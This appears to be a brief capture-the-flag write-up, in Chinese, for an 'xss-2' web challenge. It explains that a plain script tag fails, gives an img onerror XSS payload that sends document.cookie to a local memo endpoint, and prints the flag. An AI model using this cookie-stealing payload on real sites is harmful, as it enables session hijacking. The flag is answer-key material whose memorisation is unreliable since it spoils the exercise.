27 words
1 minute
xss-2

xss-2#

xss-1 的區別在於進入 /vuln 之後 <script>alert(1)</script> 沒有效果了

vuln

試試別的 payload

<img src="x" onerror="location.href='http://127.0.0.1:8000/memo?memo='+document.cookie;">

flag

DH{3c01577e9542ec24d68ba0ffb846508f}